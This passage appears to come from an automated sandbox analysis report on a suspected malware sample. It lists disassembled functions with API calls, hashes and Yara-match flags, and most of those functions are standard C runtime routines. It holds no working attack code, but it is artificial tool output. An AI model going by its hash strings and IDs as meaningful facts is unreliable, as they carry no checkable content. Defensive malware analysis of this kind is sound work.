                                                                                                    • API String ID: 4189289331-2038261262
                                                                                                    • Opcode ID: bbe416c8d69575f9d93ce627a81c40a4a4bf106591ac0e44be9dd0909605bb26
                                                                                                    • Instruction ID: f7128e803ecc638eadc91937d15ccb8599414b14ec088efe1e3a9152a03639fe
                                                                                                    • Opcode Fuzzy Hash: bbe416c8d69575f9d93ce627a81c40a4a4bf106591ac0e44be9dd0909605bb26
                                                                                                    • Instruction Fuzzy Hash: 35511A32600215EBEB209F5BAC41FAF77A9EF49324F94425FF81592282DB39D900866D
                                                                                                    APIs
                                                                                                    • DecodePointer.KERNEL32(?,?,?,?,?,?,?,?,?,?,0044018F), ref: 0043EEC5
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.4480970409.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_K27Yg4V48M.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: DecodePointer
                                                                                                    • String ID: acos$asin$exp$log$log10$pow$sqrt
                                                                                                    • API String ID: 3527080286-3064271455
                                                                                                    • Opcode ID: aa1c02400c42ddcfd268636a8d8394cc3decb473de125785aaadf9f4f02fbad0
                                                                                                    • Instruction ID: 8170d9845b751ca2959588a2f937d780391b5e174033125a046a2bd7c9c475e6
                                                                                                    • Opcode Fuzzy Hash: aa1c02400c42ddcfd268636a8d8394cc3decb473de125785aaadf9f4f02fbad0
                                                                                                    • Instruction Fuzzy Hash: 3351AF7090050EDBDF14DF99E6481ADBBB0FB4D300F2551A7E480A7295C77A8D29CB1E
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.4481494083.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_2100000_K27Yg4V48M.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 3beae9f1c9406c94f3234c3fab2046d002450fb23d60068b3c1d9a8504aa6807
                                                                                                    • Instruction ID: 4036ed433a8417e35a842835a932c7f3e7c6c72aa7714065c41d396fe2e03bb0
                                                                                                    • Opcode Fuzzy Hash: 3beae9f1c9406c94f3234c3fab2046d002450fb23d60068b3c1d9a8504aa6807
                                                                                                    • Instruction Fuzzy Hash: C3C1E471D84349AFDB17DFA8C840BAEBBB2AF0A315F0441D5E464AB391C7309945CFA9
                                                                                                    APIs
                                                                                                    • _ValidateLocalCookies.LIBCMT ref: 004286FB
                                                                                                    • ___except_validate_context_record.LIBVCRUNTIME ref: 00428703
                                                                                                    • _ValidateLocalCookies.LIBCMT ref: 00428791
                                                                                                    • __IsNonwritableInCurrentImage.LIBCMT ref: 004287BC
                                                                                                    • _ValidateLocalCookies.LIBCMT ref: 00428811
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.4480970409.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_K27Yg4V48M.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                                    • String ID: fB$csm
                                                                                                    • API String ID: 1170836740-1586063737
                                                                                                    • Opcode ID: be357bd56004c24e133951e3250c1e3ffc6610d741da1472be978505f667fff6
                                                                                                    • Instruction ID: 7444ce20eee9e01817f939fbe5b18052b9a848ec9e24e3aae95877e68e098c30
                                                                                                    • Opcode Fuzzy Hash: be357bd56004c24e133951e3250c1e3ffc6610d741da1472be978505f667fff6
                                                                                                    • Instruction Fuzzy Hash: F241FB34F012289BCF10DF19DC41A9EBBB5AF84318F64816FE9145B392DB399D11CB99
                                                                                                    APIs
                                                                                                    • FindSITargetTypeInstance.LIBVCRUNTIME ref: 00428D10
                                                                                                    • FindMITargetTypeInstance.LIBVCRUNTIME ref: 00428D29
                                                                                                    • FindVITargetTypeInstance.LIBVCRUNTIME ref: 00428D30
                                                                                                    • PMDtoOffset.LIBCMT ref: 00428D4F
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.4480970409.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_K27Yg4V48M.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: FindInstanceTargetType$Offset
                                                                                                    • String ID: Bad dynamic_cast!
                                                                                                    • API String ID: 1467055271-2956939130
                                                                                                    • Opcode ID: 3d5976511a35a3e55709e8aa5dafb06ef667d3e4312e87b96652b8bae1ee5f2b
                                                                                                    • Instruction ID: 5e24beb8d8256b5c5f325d4796605ad5260749f939022e6450d69b98b3545f73
                                                                                                    • Opcode Fuzzy Hash: 3d5976511a35a3e55709e8aa5dafb06ef667d3e4312e87b96652b8bae1ee5f2b
                                                                                                    • Instruction Fuzzy Hash: CD2137727062259FCB04DF65F902A6E77A4EF64714B60421FF900932C1DF3CE80586A9
                                                                                                    APIs
                                                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 0040557F
                                                                                                    • int.LIBCPMT ref: 00405596
                                                                                                      • Part of subcall function 0040BD5C: std::_Lockit::_Lockit.LIBCPMT ref: 0040BD6D
                                                                                                      • Part of subcall function 0040BD5C: std::_Lockit::~_Lockit.LIBCPMT ref: 0040BD87
                                                                                                    • std::locale::_Getfacet.LIBCPMT ref: 0040559F
                                                                                                    • std::_Facet_Register.LIBCPMT ref: 004055D0
                                                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 004055E6
                                                                                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 00405604
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.4480970409.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_K27Yg4V48M.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetRegisterThrowstd::locale::_
                                                                                                    • String ID: ud
                                                                                                    • API String ID: 2243866535-3751524096
                                                                                                    • Opcode ID: f8330ae3b68186870bdfbd2c21a05cb33b5aede15e19bdae88c6f234de43f936
                                                                                                    • Instruction ID: 21547056dedd0a357f918a94d9d64b27cd1eadba8e4608574907870a271d474c
                                                                                                    • Opcode Fuzzy Hash: f8330ae3b68186870bdfbd2c21a05cb33b5aede15e19bdae88c6f234de43f936
                                                                                                    • Instruction Fuzzy Hash: 3D119E72900628EBCB15EBA5C841AEEB370EF04314F14453FE811BB2D2DB789A058B9C
                                                                                                    APIs
                                                                                                    • atomic_compare_exchange.LIBCONCRT ref: 0211C6DC
                                                                                                    • atomic_compare_exchange.LIBCONCRT ref: 0211C700
                                                                                                    • std::_Cnd_initX.LIBCPMT ref: 0211C711
                                                                                                    • std::_Cnd_initX.LIBCPMT ref: 0211C71F
                                                                                                      • Part of subcall function 02101370: __Mtx_unlock.LIBCPMT ref: 02101377
                                                                                                    • std::_Cnd_initX.LIBCPMT ref: 0211C72F
                                                                                                      • Part of subcall function 0211C3EF: __Cnd_broadcast.LIBCPMT ref: 0211C3F6
                                                                                                    • Concurrency::details::_RefCounter::_Release.LIBCONCRT ref: 0211C73D
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.4481494083.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_2100000_K27Yg4V48M.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: Cnd_initstd::_$atomic_compare_exchange$Cnd_broadcastConcurrency::details::_Counter::_Mtx_unlockRelease
                                                                                                    • String ID: t#D
                                                                                                    • API String ID: 4258476935-1671555958
                                                                                                    • Opcode ID: e23295e8cd53ad3a663e09b033d10301f0236dd426b47c7b657df0c7463be66e
                                                                                                    • Instruction ID: 5942c7602b03fac3a5390b9c31d26bd93d4e40d3cec8b8097498835b69beaa5c
                                                                                                    • Opcode Fuzzy Hash: e23295e8cd53ad3a663e09b033d10301f0236dd426b47c7b657df0c7463be66e
                                                                                                    • Instruction Fuzzy Hash: BC01A272980605AFCB15B7B0CD85B9EB36ABF04310F544162E9049B6C0EBB8EB158FD2
                                                                                                    APIs
                                                                                                    • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,0042D938,0042D938,?,?,?,00432385,00000001,00000001,23E85006), ref: 0043218E
                                                                                                    • __alloca_probe_16.LIBCMT ref: 004321C6
                                                                                                    • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,00432385,00000001,00000001,23E85006,?,?,?), ref: 00432214
                                                                                                    • __alloca_probe_16.LIBCMT ref: 004322AB
                                                                                                    • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,23E85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 0043230E
                                                                                                    • __freea.LIBCMT ref: 0043231B
                                                                                                      • Part of subcall function 004336A7: RtlAllocateHeap.NTDLL(00000000,0040D870,00000000,?,0042679E,00000002,00000000,00000000,00000000,?,0040CD21,0040D870,00000004,00000000,00000000,00000000), ref: 004336D9
                                                                                                    • __freea.LIBCMT ref: 00432324
                                                                                                    • __freea.LIBCMT ref: 00432349
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.4480970409.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_K27Yg4V48M.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ByteCharMultiWide__freea$__alloca_probe_16$AllocateHeap
                                                                                                    • String ID:
                                                                                                    • API String ID: 3864826663-0
                                                                                                    • Opcode ID: cf3b119e7e49bccc4fbc7953cec60797500e2f1b6a8bfe672ac464b3af2e48c8
                                                                                                    • Instruction ID: 93f6329b7fe105f45c70b5aed5e0df07748c8d3fe3b6be6f44c821e7de56536e
                                                                                                    • Opcode Fuzzy Hash: cf3b119e7e49bccc4fbc7953cec60797500e2f1b6a8bfe672ac464b3af2e48c8
                                                                                                    • Instruction Fuzzy Hash: 5851F472610216AFDB258F71CE41EAF77A9EB48B54F14522AFD04D7280DBBCDC40C698
                                                                                                    APIs
                                                                                                      • Part of subcall function 02132141: GetLastError.KERNEL32(?,?,0212A9EC,?,00000000,?,0212CDE6,0210247E,00000000,?,00451F20), ref: 02132145
                                                                                                      • Part of subcall function 02132141: _free.LIBCMT ref: 02132178
                                                                                                      • Part of subcall function 02132141: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 021321B9
                                                                                                    • _free.LIBCMT ref: 02131444
                                                                                                    • _free.LIBCMT ref: 0213145D
                                                                                                    • _free.LIBCMT ref: 0213148F
                                                                                                    • _free.LIBCMT ref: 02131498
                                                                                                    • _free.LIBCMT ref: 021314A4
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.4481494083.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_2100000_K27Yg4V48M.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: _free$ErrorLast
                                                                                                    • String ID: C
                                                                                                    • API String ID: 3291180501-1037565863
                                                                                                    • Opcode ID: 59ec6d9c9ee678a81a712376643e3923b663826dc85482b92aac5d645df1fc00
                                                                                                    • Instruction ID: 59551e21579ecfec41c9a17ef6b9a298a270cae42a807c7c53e19f235c284060
                                                                                                    • Opcode Fuzzy Hash: 59ec6d9c9ee678a81a712376643e3923b663826dc85482b92aac5d645df1fc00
                                                                                                    • Instruction Fuzzy Hash: A6B12875A41219AFDB25DF28C884BADB7B6FB08314F1085EAD85DA7350D770AE90CF80
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.4480970409.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_K27Yg4V48M.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _free
                                                                                                    • String ID:
                                                                                                    • API String ID: 269201875-0
                                                                                                    • Opcode ID: 1c3dc1b9d9b3fad286da187fe857a54df99b30e252b8950e3012847a3cb02415
                                                                                                    • Instruction ID: bfd9ead29151d2877f631d1061df4e601ee651aa38b3335c59b440bd117a4214
                                                                                                    • Opcode Fuzzy Hash: 1c3dc1b9d9b3fad286da187fe857a54df99b30e252b8950e3012847a3cb02415
                                                                                                    • Instruction Fuzzy Hash: 9361F171900205AFDB20DF69C842B9EBBF4EB08710F14516BE884EB382E7399D41CB59
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.4481494083.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_2100000_K27Yg4V48M.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: _free
                                                                                                    • String ID:
                                                                                                    • API String ID: 269201875-0
                                                                                                    • Opcode ID: 9dd0af2cd9ac545e18683059acdc486e5edaf4f6a50a58f2a1e3dc1611189c70
                                                                                                    • Instruction ID: dc648732d5ef13bbf601da8d0d1cc7fd071defa99105a230fdc351e7eaf2d93d
                                                                                                    • Opcode Fuzzy Hash: 9dd0af2cd9ac545e18683059acdc486e5edaf4f6a50a58f2a1e3dc1611189c70
                                                                                                    • Instruction Fuzzy Hash: 6661E371D80205AFDB22CF68C841B9ABBF7FF45710F2441AAE994EB341D7719981CB94
                                                                                                    APIs
                                                                                                    • GetConsoleCP.KERNEL32(?,0042C23D,E0830C40,?,?,?,?,?,?,00433FF8,0040DDD5,0042C23D,?,0042C23D,0042C23D,0040DDD5), ref: 004338C5
                                                                                                    • __fassign.LIBCMT ref: 00433940
                                                                                                    • __fassign.LIBCMT ref: 0043395B
                                                                                                    • WideCharToMultiByte.KERNEL32(?,00000000,0042C23D,00000001,?,00000005,00000000,00000000), ref: 00433981
                                                                                                    • WriteFile.KERNEL32(?,?,00000000,00433FF8,00000000,?,?,?,?,?,?,?,?,?,00433FF8,0040DDD5), ref: 004339A0
                                                                                                    • WriteFile.KERNEL32(?,0040DDD5,00000001,00433FF8,00000000,?,?,?,?,?,?,?,?,?,00433FF8,0040DDD5), ref: 004339D9
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.4480970409.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_K27Yg4V48M.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                                                    • String ID:
                                                                                                    • API String ID: 1324828854-0
                                                                                                    • Opcode ID: 701a8cb139ac8c875ca722d2ea664996543124ca91dde6e2e1173c132f03efc9
                                                                                                    • Instruction ID: 0964c92a74c3400c6cb4ab9b4b67413798647f05f85f7adc4f4dadb846cf7038
                                                                                                    • Opcode Fuzzy Hash: 701a8cb139ac8c875ca722d2ea664996543124ca91dde6e2e1173c132f03efc9
                                                                                                    • Instruction Fuzzy Hash: 3451C271E00209AFDB10DFA8D885BEEBBF4EF09301F14412BE556E7291E7749A41CB69
                                                                                                    APIs
                                                                                                    • GetConsoleCP.KERNEL32(?,?,?,?,?,?,?,?,?,0213425F,?,?,?,?,?,?), ref: 02133B2C
                                                                                                    • __fassign.LIBCMT ref: 02133BA7
                                                                                                    • __fassign.LIBCMT ref: 02133BC2
                                                                                                    • WideCharToMultiByte.KERNEL32(?,00000000,?,00000001,?,00000005,00000000,00000000), ref: 02133BE8
                                                                                                    • WriteFile.KERNEL32(?,?,00000000,0213425F,00000000,?,?,?,?,?,?,?,?,?,0213425F,?), ref: 02133C07
                                                                                                    • WriteFile.KERNEL32(?,?,00000001,0213425F,00000000,?,?,?,?,?,?,?,?,?,0213425F,?), ref: 02133C40
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.4481494083.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_2100000_K27Yg4V48M.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                                                    • String ID:
                                                                                                    • API String ID: 1324828854-0
                                                                                                    • Opcode ID: 3d1a47c850e04374499698871a03745696c64c98de2feb07923d8311921bf8e0
                                                                                                    • Instruction ID: b3f3f842f9e0cc1feefd30d1f79942c1dccb2e707bb10f42d8032d0e2dd199e3
                                                                                                    • Opcode Fuzzy Hash: 3d1a47c850e04374499698871a03745696c64c98de2feb07923d8311921bf8e0
                                                                                                    • Instruction Fuzzy Hash: 6251E574D00209AFCB11CFA8D884AEEBBF5EF09714F14416EE565E7291D730AA81CFA4
                                                                                                    APIs
                                                                                                    • Concurrency::details::ThreadProxy::SuspendExecution.LIBCMT ref: 02124ACD
                                                                                                      • Part of subcall function 02124D9C: WaitForSingleObjectEx.KERNEL32(?,000000FF,00000000,00000000,02124800), ref: 02124DAC
                                                                                                    • Concurrency::details::FreeVirtualProcessorRoot::ResetOnIdle.LIBCONCRT ref: 02124AE2
                                                                                                    • std::invalid_argument::invalid_argument.LIBCONCRT ref: 02124AF1
                                                                                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 02124AFF
                                                                                                    • Concurrency::details::FreeVirtualProcessorRoot::Affinitize.LIBCONCRT ref: 02124B75
                                                                                                    • std::invalid_argument::invalid_argument.LIBCONCRT ref: 02124BB5
                                                                                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 02124BC3
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.4481494083.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_2100000_K27Yg4V48M.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: Concurrency::details::$Exception@8FreeProcessorRoot::ThrowVirtualstd::invalid_argument::invalid_argument$AffinitizeExecutionIdleObjectProxy::ResetSingleSuspendThreadWait
                                                                                                    • String ID:
                                                                                                    • API String ID: 3151764488-0
                                                                                                    • Opcode ID: 219df9cbfeb1429f4312672cca97738a090813e365a6f1d89fd3b539392bd973
                                                                                                    • Instruction ID: b44d667801a353c05a6d340e6ac32bc3c50f76028e136d77e6801b87b276eab0
                                                                                                    • Opcode Fuzzy Hash: 219df9cbfeb1429f4312672cca97738a090813e365a6f1d89fd3b539392bd973
                                                                                                    • Instruction Fuzzy Hash: 4B31C639A402249FCF18EF68C885B6D73B6FF44710F214565F9269B281DB70EE29CB94
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.4480970409.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_K27Yg4V48M.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 26fd24188a083ade74c1b847c8e385b80c443176beafc5e0d5befa98fb89b42a
                                                                                                    • Instruction ID: 860e752c6eb2c716a5d855c3c03ea0c0e6c73714a276bf2c7701abe861d4aafe
                                                                                                    • Opcode Fuzzy Hash: 26fd24188a083ade74c1b847c8e385b80c443176beafc5e0d5befa98fb89b42a
                                                                                                    • Instruction Fuzzy Hash: 51113A72A00216BFD7206FB7AC04F6B7B6CEF8A735F10123BF815C7240DA3889048669
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.4481494083.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_2100000_K27Yg4V48M.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 3d1ac6632e527dd31d058b85c9e7d58ea3761bf3ce0a696b0fb445ac4584affe
                                                                                                    • Instruction ID: 1a3ee02382aed491ce83eec5eaeb3ac276f09a5a5fb454459a91788a0238055b
                                                                                                    • Opcode Fuzzy Hash: 3d1ac6632e527dd31d058b85c9e7d58ea3761bf3ce0a696b0fb445ac4584affe
                                                                                                    • Instruction Fuzzy Hash: E511D6719C4129BFDB262F768C48D6B7A5FEF82B31B110625FC29C7250DB308912CAA0
                                                                                                    APIs
                                                                                                      • Part of subcall function 0043A0CA: _free.LIBCMT ref: 0043A0F3
                                                                                                    • _free.LIBCMT ref: 0043A3D1
                                                                                                      • Part of subcall function 0043346A: HeapFree.KERNEL32(00000000,00000000,?,0043A0F8,?,00000000,?,00000000,?,0043A39C,?,00000007,?,?,0043A790,?), ref: 00433480
                                                                                                      • Part of subcall function 0043346A: GetLastError.KERNEL32(?,?,0043A0F8,?,00000000,?,00000000,?,0043A39C,?,00000007,?,?,0043A790,?,?), ref: 00433492
                                                                                                    • _free.LIBCMT ref: 0043A3DC
                                                                                                    • _free.LIBCMT ref: 0043A3E7
                                                                                                    • _free.LIBCMT ref: 0043A43B
                                                                                                    • _free.LIBCMT ref: 0043A446
                                                                                                    • _free.LIBCMT ref: 0043A451
                                                                                                    • _free.LIBCMT ref: 0043A45C
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.4480970409.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_K27Yg4V48M.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _free$ErrorFreeHeapLast
                                                                                                    • String ID:
                                                                                                    • API String ID: 776569668-0
                                                                                                    • Opcode ID: b7590f4111be71bf3afae53295ff9af9b533932b666efaf04c0ab8a9c80b4b90
                                                                                                    • Instruction ID: 8be3f6aa1696d7c36a68609bae5c6e68c8e713719265dd61fa4e844ff8b4370f
                                                                                                    • Opcode Fuzzy Hash: b7590f4111be71bf3afae53295ff9af9b533932b666efaf04c0ab8a9c80b4b90
                                                                                                    • Instruction Fuzzy Hash: C611B472581B04A6E531BF72CC0BFCB77AD6F18305F40581EB6DA7B052CA2CB5144B46
                                                                                                    APIs
                                                                                                      • Part of subcall function 0213A331: _free.LIBCMT ref: 0213A35A
                                                                                                    • _free.LIBCMT ref: 0213A638
                                                                                                      • Part of subcall function 021336D1: HeapFree.KERNEL32(00000000,00000000,?,0213A35F,?,00000000,?,00000000,?,0213A603,?,00000007,?,?,0213A9F7,?), ref: 021336E7
                                                                                                      • Part of subcall function 021336D1: GetLastError.KERNEL32(?,?,0213A35F,?,00000000,?,00000000,?,0213A603,?,00000007,?,?,0213A9F7,?,?), ref: 021336F9
                                                                                                    • _free.LIBCMT ref: 0213A643
                                                                                                    • _free.LIBCMT ref: 0213A64E
                                                                                                    • _free.LIBCMT ref: 0213A6A2
                                                                                                    • _free.LIBCMT ref: 0213A6AD
                                                                                                    • _free.LIBCMT ref: 0213A6B8
                                                                                                    • _free.LIBCMT ref: 0213A6C3
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.4481494083.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_2100000_K27Yg4V48M.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: _free$ErrorFreeHeapLast
                                                                                                    • String ID:
                                                                                                    • API String ID: 776569668-0
                                                                                                    • Opcode ID: b7590f4111be71bf3afae53295ff9af9b533932b666efaf04c0ab8a9c80b4b90
                                                                                                    • Instruction ID: 0331c0faacdbb50bcde2d6818e6e2ef230300940d1e86d898a44938b2ef80f8f
                                                                                                    • Opcode Fuzzy Hash: b7590f4111be71bf3afae53295ff9af9b533932b666efaf04c0ab8a9c80b4b90
                                                                                                    • Instruction Fuzzy Hash: 031151716C4B04AEDE22B7B1CC49FCF779FDF00700F400825A2E9AA290DB65B5544E94
                                                                                                    APIs
                                                                                                    • GetLastError.KERNEL32(?,?,?,0042EACE,00434D7C,?,00431F08,00000001,00000364,?,0042DFE5,00457910,00000010), ref: 00431F63
                                                                                                    • _free.LIBCMT ref: 00431F98
                                                                                                    • _free.LIBCMT ref: 00431FBF
                                                                                                    • SetLastError.KERNEL32(00000000), ref: 00431FCC
                                                                                                    • SetLastError.KERNEL32(00000000), ref: 00431FD5
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.4480970409.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_K27Yg4V48M.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ErrorLast$_free
                                                                                                    • String ID: Gg
                                                                                                    • API String ID: 3170660625-2883760843
                                                                                                    • Opcode ID: 0d5363e4b9499eccdb5c1a3a84b8776c6d310bab5e63f5db74e86071099be707
                                                                                                    • Instruction ID: 0958b0acb89a9b0c851ef96239832ae32a3192186555c964954bc496c6487c7c
                                                                                                    • Opcode Fuzzy Hash: 0d5363e4b9499eccdb5c1a3a84b8776c6d310bab5e63f5db74e86071099be707
                                                                                                    • Instruction Fuzzy Hash: EA01F936249A007BD7122B266C45D2B262DEBD977AF21212FF804933F2EF6C8D02412D
                                                                                                    APIs
                                                                                                    • GetLastError.KERNEL32(0210DAD7,0210DAD7,00000002,0212ED35,02133951,00000000,?,02126A05,00000002,00000000,00000000,00000000,?,0210CF88,0210DAD7,00000004), ref: 021321CA
                                                                                                    • _free.LIBCMT ref: 021321FF
                                                                                                    • _free.LIBCMT ref: 02132226
                                                                                                    • SetLastError.KERNEL32(00000000,?,0210DAD7), ref: 02132233
                                                                                                    • SetLastError.KERNEL32(00000000,?,0210DAD7), ref: 0213223C
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.4481494083.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_2100000_K27Yg4V48M.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: ErrorLast$_free
                                                                                                    • String ID: Gg
                                                                                                    • API String ID: 3170660625-2883760843
                                                                                                    • Opcode ID: 868f3b611709ec7aceee6e1f81eadbb74bd3caefd1ad767be0b3b05927239706
                                                                                                    • Instruction ID: 499b183fade4b9ec6071df991951dac1c8033305933d616812226319bdea87b1
                                                                                                    • Opcode Fuzzy Hash: 868f3b611709ec7aceee6e1f81eadbb74bd3caefd1ad767be0b3b05927239706
                                                                                                    • Instruction Fuzzy Hash: 8701A4362C5B007F93177B345C48E2B262FBBD2B72B610138FD25E2291EFB48D058569
                                                                                                    APIs
                                                                                                    • GetLogicalProcessorInformation.KERNEL32(00000000,?,00000000,?,0000FFFF,00000000,?,00000000,?,00410B39,?,?,?,00000000), ref: 00412400
                                                                                                    • GetLastError.KERNEL32(?,0000FFFF,00000000,?,00000000,?,00410B39,?,?,?,00000000), ref: 00412406
                                                                                                    • GetLogicalProcessorInformation.KERNEL32(00000000,?,?,0000FFFF,00000000,?,00000000,?,00410B39,?,?,?,00000000), ref: 00412433
                                                                                                    • GetLastError.KERNEL32(?,0000FFFF,00000000,?,00000000,?,00410B39,?,?,?,00000000), ref: 0041243D
                                                                                                    • GetLastError.KERNEL32(?,0000FFFF,00000000,?,00000000,?,00410B39,?,?,?,00000000), ref: 0041244F
                                                                                                    • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 00412465
                                                                                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 00412473
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.4480970409.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_K27Yg4V48M.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ErrorLast$InformationLogicalProcessor$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorException@8Throw
                                                                                                    • String ID:
                                                                                                    • API String ID: 4227777306-0
                                                                                                    • Opcode ID: a863a92f0c1e6d652057a51708b91d14413968702bc4a7dce5340fefc1acb9cb
                                                                                                    • Instruction ID: 91daacb073e6275429519e5223cc2729029c874a602b9c25603bfcabc23aa3f5
